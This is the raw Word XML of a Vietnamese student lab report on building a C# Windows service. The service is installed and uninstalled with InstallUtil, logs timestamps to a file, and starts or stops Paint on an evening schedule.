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1 (Session 01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1256D11A" w14:textId="3580B698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872CD" w:rsidRPr="00E872CD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Windows Service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3128BA">
        <w:rPr>
          <w:i/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">GV: </w:t>
      </w:r>
      <w:r w:rsidR="009613E4" w:rsidRPr="003128BA">
        <w:rPr>
          <w:i/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Nghi Hoàng Khoa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611CFD60" w14:textId="35B9D5B6" w:rsidR="00B16956" w:rsidRPr="003128BA" w:rsidRDefault="00B16956" w:rsidP="00B16956">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003128BA">
        <w:rPr>
          <w:i/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Ngày báo cáo: </w:t>
      </w:r>
      <w:r w:rsidR="003128BA" w:rsidRPr="003128BA">
        <w:rPr>
          <w:i/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidRPr="003128BA">
        <w:rPr>
          <w:i/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="003128BA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="003128BA">
        <w:rPr>
          <w:i/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>/20</w:t>
      </w:r>
      <w:r w:rsidR="003128BA">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FCEAD3" w14:textId="6BAEF7FC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1B412E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>09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375A8B37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1B412E" w:rsidRPr="001B412E">
        <w:t>NT230.N21.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28E3B147" w:rsidR="008D0072" w:rsidRDefault="001B412E" w:rsidP="00FF12B3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t>Nguyễn Bùi Kim Ngân</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2431" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F74B605" w14:textId="19ED7D4B" w:rsidR="008D0072" w:rsidRDefault="001B412E" w:rsidP="00FF12B3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t>20520648</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3298" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69359CA4" w14:textId="5CE66CA1" w:rsidR="008D0072" w:rsidRDefault="001B412E" w:rsidP="008D0072">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>20520648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C815EF7" w:rsidR="008D0072" w:rsidRDefault="001B412E" w:rsidP="00FF12B3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t>Nguyễn Bình Thục Trâm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2431" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0731347F" w14:textId="2680DA63" w:rsidR="008D0072" w:rsidRDefault="001B412E" w:rsidP="00FF12B3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
              <w:ind w:left="156"/>
            </w:pPr>
            <w:r>
              <w:t>20520815</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3298" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="236D4D96" w14:textId="7C323F82" w:rsidR="008D0072" w:rsidRDefault="006004DF" w:rsidP="00FF12B3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>2052081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672DBE" w14:paraId="1323FA92" w14:textId="77777777" w:rsidTr="0027532A">
        <w:trPr>
          <w:trHeight w:val="52"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="682" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0942004C" w14:textId="66507F8A" w:rsidR="00672DBE" w:rsidRDefault="00672DBE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44121570" w14:textId="2107A507" w:rsidR="00672DBE" w:rsidRDefault="00672DBE" w:rsidP="00E96342">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Tạo Window service theo hướng dẫn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04CD3B83" w14:textId="5366D982" w:rsidR="00672DBE" w:rsidRDefault="00672DBE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5070D18D" w14:textId="0D2D50C5" w:rsidR="00672DBE" w:rsidRDefault="005D39E9" w:rsidP="00D556D3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Nguyễn Bình Thục Trâm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6FEA5FE" w:rsidR="0027532A" w:rsidRDefault="00672DBE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557708A7" w14:textId="6634D4F2" w:rsidR="0027532A" w:rsidRDefault="006004DF" w:rsidP="00E96342">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Bài thực hành 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34597EBA" w:rsidR="0027532A" w:rsidRDefault="005D39E9" w:rsidP="00D556D3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Nguyễn Bình Thục Trâm</w:t>
            </w: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199019DC" w:rsidR="0027532A" w:rsidRDefault="00672DBE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9271EF6" w14:textId="4ACC2556" w:rsidR="0027532A" w:rsidRPr="00B00619" w:rsidRDefault="00B71474" w:rsidP="00E96342">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Bài thực hành 2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827460C" w:rsidR="0027532A" w:rsidRDefault="00117631" w:rsidP="004A55AE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Nguyễn Bùi Kim Ngân</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B71474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612BD281" w:rsidR="00B71474" w:rsidRDefault="00672DBE" w:rsidP="00B71474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6E3A8CC4" w14:textId="69493940" w:rsidR="00B71474" w:rsidRDefault="00B71474" w:rsidP="00B71474">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Bài thực hành 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CD217D1" w14:textId="5A63CD14" w:rsidR="00B71474" w:rsidRDefault="00B71474" w:rsidP="00B71474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433B3B8C" w:rsidR="00B71474" w:rsidRDefault="005D39E9" w:rsidP="00B71474">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Nguyễn Bùi Kim Ngân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456450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2D9C20AF" w14:textId="4554267D" w:rsidR="00683A39" w:rsidRDefault="001705DA" w:rsidP="00CE64A9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tạo Window service bằng C#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105A0E14" w14:textId="46C05A87" w:rsidR="001705DA" w:rsidRDefault="00C1326B" w:rsidP="00CE64A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tạo</w:t>
      </w:r>
      <w:r w:rsidR="005B1631">
        <w:t xml:space="preserve"> project Window service</w:t>
      </w:r>
      <w:r w:rsidR="00893B1F">
        <w:t xml:space="preserve"> (.NET Framework) C#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178EFC27" w14:textId="10835542" w:rsidR="00893B1F" w:rsidRDefault="00893B1F" w:rsidP="00CE64A9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00893B1F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="196A73A9" wp14:editId="370179C9">
            <wp:extent cx="6115050" cy="4009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8AE9" w14:textId="18A83ABE" w:rsidR="00CE64A9" w:rsidRDefault="00456450" w:rsidP="00CE64A9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00456450">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08E2513C" wp14:editId="71440751">
            <wp:extent cx="6115050" cy="4037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12A" w14:textId="4CA0E588" w:rsidR="001A09AE" w:rsidRDefault="000A57E5" w:rsidP="000A57E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000A57E5">
        <w:t>Thêm Installer cho Windows service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BCB9A5" w14:textId="3D30BF48" w:rsidR="000A57E5" w:rsidRDefault="00532F58" w:rsidP="000A57E5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Thêm nội dung vào ProjectInstaller</w:t>
      </w:r>
      <w:r w:rsidR="006904B7">
        <w:t>.Designer.cs</w:t>
      </w:r>
      <w:r w:rsidR="00F25B1F">
        <w:t xml:space="preserve">, đặt tên </w:t>
      </w:r>
      <w:r w:rsidR="00ED2D28">
        <w:t>hiển thị và mô tả cho service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1BCC9B" w14:textId="65F4D655" w:rsidR="00ED2D28" w:rsidRDefault="00DE2D37" w:rsidP="00ED2D28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1A96715" wp14:editId="5C709444">
            <wp:extent cx="5732780" cy="3227070"/>
            <wp:effectExtent l="0" t="0" r="127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A68F" w14:textId="77777777" w:rsidR="00133B31" w:rsidRDefault="00133B31" w:rsidP="00133B31">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="337448AA" w14:textId="77777777" w:rsidR="00133B31" w:rsidRDefault="00133B31">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1928B702" w14:textId="5B2B9EB4" w:rsidR="001A2D64" w:rsidRDefault="00A33656" w:rsidP="00133B31">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Thêm đoạn mã làm công việc</w:t>
      </w:r>
      <w:r w:rsidR="00133B31">
        <w:t xml:space="preserve"> tạo một tập tin văn bản và ghi thời gian hiện tại vào tập tin văn bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B6666" w14:textId="78CE622A" w:rsidR="00ED2D28" w:rsidRDefault="004B791F" w:rsidP="004B791F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98D0DB" wp14:editId="2191351B">
            <wp:extent cx="5732780" cy="322707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26B2" w14:textId="0F503842" w:rsidR="004B791F" w:rsidRDefault="00DE2D37" w:rsidP="00DE2D37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CBC8FB8" wp14:editId="094DF8D8">
            <wp:extent cx="5732780" cy="3227070"/>
            <wp:effectExtent l="0" t="0" r="127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1213" w14:textId="4B9C1B5F" w:rsidR="0067668D" w:rsidRDefault="0067668D" w:rsidP="0067668D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Build ứng dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14275093" w14:textId="61BD492D" w:rsidR="00DE2D37" w:rsidRDefault="0067668D" w:rsidP="0067668D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Chọn Build &gt; Rebuild Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308884C4" w14:textId="696087B8" w:rsidR="0067668D" w:rsidRDefault="0067668D" w:rsidP="0067668D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FA59ED" wp14:editId="029D58B3">
            <wp:extent cx="5732780" cy="887730"/>
            <wp:effectExtent l="0" t="0" r="127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FF3F" w14:textId="2BB52EA3" w:rsidR="00E76879" w:rsidRDefault="00E76879" w:rsidP="00773BBE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Mở folder của </w:t>
      </w:r>
      <w:r w:rsidR="00BD304A">
        <w:t>service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D5C6BE" w14:textId="1DCC2685" w:rsidR="00E271BF" w:rsidRDefault="00E271BF" w:rsidP="00E271BF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816631" wp14:editId="5D584140">
            <wp:extent cx="5732780" cy="322707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704A" w14:textId="6B5CE43D" w:rsidR="00E271BF" w:rsidRDefault="00E271BF" w:rsidP="00D13B78">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A42A8D9" w14:textId="5CD3D128" w:rsidR="00D13B78" w:rsidRDefault="005253CF" w:rsidP="005253CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00D13B78">
        <w:t>iếp tục di chuyển đến bin &gt; Debug và sao chép đ</w:t>
      </w:r>
      <w:r w:rsidR="00D13B78">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="00D13B78">
        <w:t xml:space="preserve">ờng </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D13B78">
        <w:t>dẫn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE49C14" w14:textId="15DABF0B" w:rsidR="005253CF" w:rsidRDefault="005253CF" w:rsidP="005253CF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DB879C0" wp14:editId="391D61D4">
            <wp:extent cx="5732780" cy="1779270"/>
            <wp:effectExtent l="0" t="0" r="127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1E85" w14:textId="77777777" w:rsidR="005253CF" w:rsidRDefault="005253CF" w:rsidP="005253CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39450F35" w14:textId="1426BA50" w:rsidR="0067668D" w:rsidRDefault="00AF6DE5" w:rsidP="00773BBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tro</w:t>
      </w:r>
      <w:r w:rsidR="00B13926">
        <w:t>ng “</w:t>
      </w:r>
      <w:r w:rsidR="00B13926" w:rsidRPr="00B13926">
        <w:t>Command Prompt” d</w:t>
      </w:r>
      <w:r w:rsidR="00B13926" w:rsidRPr="00B13926">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="00B13926" w:rsidRPr="00B13926">
        <w:t>ới quyền administrator</w:t>
      </w:r>
      <w:r w:rsidR="00B13926">
        <w:t>, d</w:t>
      </w:r>
      <w:r w:rsidR="00773BBE">
        <w:t xml:space="preserve">i chuyển đến </w:t>
      </w:r>
      <w:r w:rsidR="00773BBE" w:rsidRPr="00773BBE">
        <w:t>C:\Windows\Microsoft.NET\Framework\v4.0.30319</w:t>
      </w:r>
      <w:r w:rsidR="00773BBE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00090537">
        <w:t>và tiến hành cài đặt service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358CEDFD" w14:textId="26D59690" w:rsidR="00B13926" w:rsidRDefault="004D07CC" w:rsidP="004D07CC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A28EC33" wp14:editId="27096BFE">
            <wp:extent cx="5732780" cy="3303270"/>
            <wp:effectExtent l="0" t="0" r="127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C46A" w14:textId="77777777" w:rsidR="004D07CC" w:rsidRDefault="004D07CC" w:rsidP="00B13926">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C493149" w14:textId="12BDE16B" w:rsidR="00955705" w:rsidRDefault="00955705" w:rsidP="00955705">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00955705">
        <w:t>Kiểm tra trạng thái của Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCA244D" w14:textId="4052F0CC" w:rsidR="00955705" w:rsidRDefault="00CE6157" w:rsidP="00CE6157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48C4DC" wp14:editId="17B2C597">
            <wp:extent cx="5732780" cy="3801110"/>
            <wp:effectExtent l="0" t="0" r="1270" b="889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A6E2" w14:textId="54A10D48" w:rsidR="00CE6157" w:rsidRDefault="00CE6157">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4187738D" w14:textId="66EF39F4" w:rsidR="00CE6157" w:rsidRDefault="00CE6157" w:rsidP="00CE6157">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE6157">
        <w:lastRenderedPageBreak/>
        <w:t>Kiểm tra output của Windows service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A10633" w14:textId="7F43933A" w:rsidR="000416C2" w:rsidRDefault="000416C2" w:rsidP="000416C2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1AA68CA" wp14:editId="3F9EEF52">
            <wp:extent cx="5732780" cy="3227070"/>
            <wp:effectExtent l="0" t="0" r="127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00D7" w14:textId="77777777" w:rsidR="000416C2" w:rsidRPr="001705DA" w:rsidRDefault="000416C2" w:rsidP="000416C2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9BD5DB" w14:textId="5EDBE903" w:rsidR="00F13188" w:rsidRDefault="00603991" w:rsidP="00CE64A9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bài thực hành 1</w:t>
      </w:r>
      <w:r w:rsidR="000416C2">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="000416C2" w:rsidRPr="000416C2">
        <w:t>Sinh viên trình bày cách gỡ cài đặt Window service trên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FA6483" w14:textId="520357E2" w:rsidR="007D281E" w:rsidRDefault="008C4137" w:rsidP="008C4137">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Trong “</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13926">
        <w:t xml:space="preserve">Command Prompt” </w:t>
      </w:r>
      <w:r>
        <w:t>gõ lệnh sau</w:t>
      </w:r>
      <w:r w:rsidR="003050AA">
        <w:t xml:space="preserve"> để cài đặt serv</w:t>
      </w:r>
      <w:r w:rsidR="004E33E4">
        <w:t>ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75538D21" w14:textId="2A83B3CB" w:rsidR="008C4137" w:rsidRDefault="0068551E" w:rsidP="00ED04F2">
      <w:r w:rsidRPr="0068551E">
        <w:t>InstallUtil.exe</w:t>
      </w:r>
      <w:r w:rsidR="00ED04F2">
        <w:t xml:space="preserve"> /u </w:t>
      </w:r>
      <w:r w:rsidR="009C3A2F" w:rsidRPr="009C3A2F">
        <w:t>D:\NT230\Lab2\20520648-20520815\20520648-20520815\bin\Debug\20520648-20520815.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB76C83" w14:textId="2472F366" w:rsidR="00673311" w:rsidRDefault="00DC6134" w:rsidP="008C4137">
      <w:pPr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483FF7" wp14:editId="31CEE9B9">
            <wp:extent cx="5732780" cy="3312160"/>
            <wp:effectExtent l="0" t="0" r="1270" b="254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55A9" w14:textId="77777777" w:rsidR="00673311" w:rsidRDefault="00673311">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5915628F" w14:textId="77777777" w:rsidR="00ED04F2" w:rsidRPr="007D281E" w:rsidRDefault="00ED04F2" w:rsidP="008C4137">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FB5095E" w14:textId="20736833" w:rsidR="00BA539D" w:rsidRDefault="007E2EAF" w:rsidP="002E520C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bài thực hành </w:t>
      </w:r>
      <w:r w:rsidR="007D281E">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005D4758">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="002E520C">
        <w:t>Viết một Windows service có nhiệm vụ kiểm tra một “process” ở trạng thái hoạt động run/stop hay không và run/stop “process” theo một lịch biểu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602C8EF4" w14:textId="3FD7BD9F" w:rsidR="0006488A" w:rsidRDefault="003B2959" w:rsidP="0006488A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Đặt tên và miêu tả cho Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B22999D" w14:textId="4CBEA167" w:rsidR="003B2959" w:rsidRDefault="0006488A" w:rsidP="005066F5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0006488A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4842DC5C" wp14:editId="7038A4BD">
            <wp:extent cx="5334157" cy="19486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129" cy="19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F457" w14:textId="32494C6D" w:rsidR="002E520C" w:rsidRDefault="0016198C" w:rsidP="003B2959">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Window service kiểm tra trạng thái </w:t>
      </w:r>
      <w:r w:rsidR="0006488A">
        <w:t xml:space="preserve">hoạt động của </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">chương trình </w:t>
      </w:r>
      <w:r w:rsidR="0006488A">
        <w:t>Paint và đặt lịch biểu hoạt động vào 20h – 21h mỗi ngày</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6CD094" w14:textId="60232655" w:rsidR="00721C46" w:rsidRDefault="00721C46" w:rsidP="00721C46">
      <w:r>
        <w:t xml:space="preserve">File name: </w:t>
      </w:r>
      <w:r w:rsidRPr="00721C46">
        <w:t>Service1.cs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3257C8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25E8BB2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5021DEB1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ComponentModel;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E68FA87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Data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5FD8C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Diagnostics;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640CD616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5B7DEAE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08A867E6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ServiceProcess;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA691D6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Text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743589D1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Threading.Tasks;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F51747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Timers;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098ADE7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F85C67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Lab2_Bai2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1A818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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E87695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kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Service1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: ServiceBase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6219F7BC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941DDB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Timer timer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Timer();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name space(using System.Timers;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE25C1E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kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Service1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF4A0B3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C5B689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0EF898DD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0D09C2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793C4F82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OnStart(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] args)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C32E22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CD8439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Service is started at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3A566F8D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timer.Elapsed +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ElapsedEventHandler(OnElapsedTime);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21023CFB" w14:textId="4E7642E3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timer.Interval = 5000;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number in milisec</w:t>
      </w:r>
      <w:r w:rsidR="0059733F"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o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nds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEA2AF8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timer.Enabled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4B7F585D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F6DD3C1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6361898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OnStop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE4CD0A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9AD4C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Service is stopped at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09E259A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94F59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C9D761F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OnElapsedTime(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ource, ElapsedEventArgs e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC950D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92E1553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Service is recall at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57F50238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[] myProcess = Process.GetProcessesByNam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mspaint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6D62FBDA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0964CE6A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check Process Status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4F617E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myProcess.Length &gt; 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5C0653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86B793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4E151AE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Paint' status: RUN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1AB4E7B5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929C68C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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B2C0C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E99620F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3D53D143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Paint' status: STOP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538FBBD3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C25683D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521CDD27" w14:textId="133783F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Set Process Schedule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385CF7B6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DateTime.Now.Hour &gt;= 20 &amp;&amp; DateTime.Now.Hour &lt;= 21)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6197D316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889E842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Process.Start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mspaint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7D9FE9B7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Process starts on schedule: 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7AD60517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8E4E0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myProcess.Length &gt; 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11550498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59DF3C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var process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Process.GetProcessesByNam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mspaint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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179E6B8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3908133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    process.Kill();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B942DD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347011C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Process stops on schedule: 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36026D6F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62D0222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B79EC7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3A531C9F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WriteToFile(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Message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217DE1EC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50CC42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path = AppDomain.CurrentDomain.BaseDirectory +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\\Logs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37B902A7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!Directory.Exists(path))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA7921D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A9D4D61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Directory.CreateDirectory(path);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAE8331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4EBB96E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filepath = AppDomain.CurrentDomain.BaseDirectory +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\\Logs\\ServiceLog_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235878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DateTime.Now.Date.ToShortDateString().Replac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'/'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'_'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) +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.txt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0A9C31D7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!File.Exists(filepath))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2530ADC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788106C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Create a file to write to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EAEA9C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StreamWriter sw = File.CreateText(filepath))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6437214F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205CE35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    sw.WriteLine(Message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C4A06C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94B088E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E9407B3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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF84F3E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404E8F9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StreamWriter sw = File.AppendText(filepath))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6A5E37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AAD41F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    sw.WriteLine(Message);</w:t>
      </w:r>
    </w:p>
